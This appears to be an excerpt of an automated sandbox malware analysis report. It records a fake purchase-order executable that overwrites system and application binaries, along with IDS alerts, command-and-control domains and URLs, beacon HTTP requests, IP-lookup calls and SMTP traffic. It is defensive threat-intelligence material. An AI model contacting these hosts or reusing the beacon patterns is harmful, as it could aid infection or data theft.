                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B15908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02B15908
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001A0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,13_2_001A0207
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001A589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,13_2_001A589A
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001B3E66 FindFirstFileW,FindNextFileW,FindClose,13_2_001B3E66
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001A4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,13_2_001A4EC1
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_0019532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,13_2_0019532E
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001A589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,22_2_001A589A
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001A0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,22_2_001A0207
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001B3E66 FindFirstFileW,FindNextFileW,FindClose,22_2_001B3E66
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001A4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,22_2_001A4EC1
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_0019532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,22_2_0019532E
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.9:49709 -> 54.244.188.177:80
                  Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.9:49551 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.9:64135 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.9:51600 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.9:62925 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.9:49737 -> 82.112.184.197:80
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://lwaziacademy.com/royal/233_Sdvvfamydeo
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B2E4B8 InternetCheckConnectionA,0_2_02B2E4B8
                  Source: global trafficTCP traffic: 192.168.2.9:49725 -> 103.20.200.105:587
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 13.248.148.254 13.248.148.254
                  Source: Joe Sandbox ViewIP Address: 13.248.148.254 13.248.148.254
                  Source: Joe Sandbox ViewIP Address: 172.234.222.143 172.234.222.143
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49707 -> 41.185.8.252:443
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.9:49718
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.9:49718
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.9:49723
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.9:49723
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49710 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.9:49720
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.9:49720
                  Source: global trafficTCP traffic: 192.168.2.9:49725 -> 103.20.200.105:587
                  Source: global trafficHTTP traffic detected: GET /royal/233_Sdvvfamydeo HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: lwaziacademy.com
                  Source: global trafficHTTP traffic detected: POST /nimjw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: POST /jae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                  Source: global trafficHTTP traffic detected: POST /kka HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /fapn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                  Source: global trafficHTTP traffic detected: POST /fupmvmgjbhmts HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /xujrrbphgxpfxye HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                  Source: global trafficHTTP traffic detected: POST /npdqgsoqmq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /obujsmdylt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                  Source: global trafficHTTP traffic detected: GET /obujsmdylt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
                  Source: global trafficHTTP traffic detected: POST /cbecuogqej HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: POST /bjede HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /cairvr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                  Source: global trafficHTTP traffic detected: GET /bjede HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /cairvr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /bjede?usid=18&utid=28672493896 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /cairvr?usid=18&utid=28672493914 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                  Source: global trafficHTTP traffic detected: POST /fauopp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /uoxisrajk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                  Source: global trafficHTTP traffic detected: GET /fauopp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /fauopp?usid=18&utid=28672494417 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
                  Source: global trafficHTTP traffic detected: POST /jedofahyn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /ahrvaxreoca HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                  Source: global trafficHTTP traffic detected: POST /tjgeolaydho HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /bwbcqohd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                  Source: global trafficHTTP traffic detected: POST /pfoxkxwneqnmhcsc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /goescaydbiatn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                  Source: global trafficHTTP traffic detected: POST /ewvwgr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /ovwmjligotchf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                  Source: global trafficHTTP traffic detected: POST /eooel HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.9:49712 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /royal/233_Sdvvfamydeo HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: lwaziacademy.com
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET /obujsmdylt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET /bjede HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /cairvr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /bjede?usid=18&utid=28672493896 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /cairvr?usid=18&utid=28672493914 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /fauopp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /fauopp?usid=18&utid=28672494417 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: lwaziacademy.com
                  Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
                  Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
                  Source: global trafficDNS traffic detected: DNS query: przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: ww99.przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: webmail.thematman.com.au
                  Source: global trafficDNS traffic detected: DNS query: ww12.przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: ww7.przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: zlenh.biz
                  Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
                  Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
                  Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
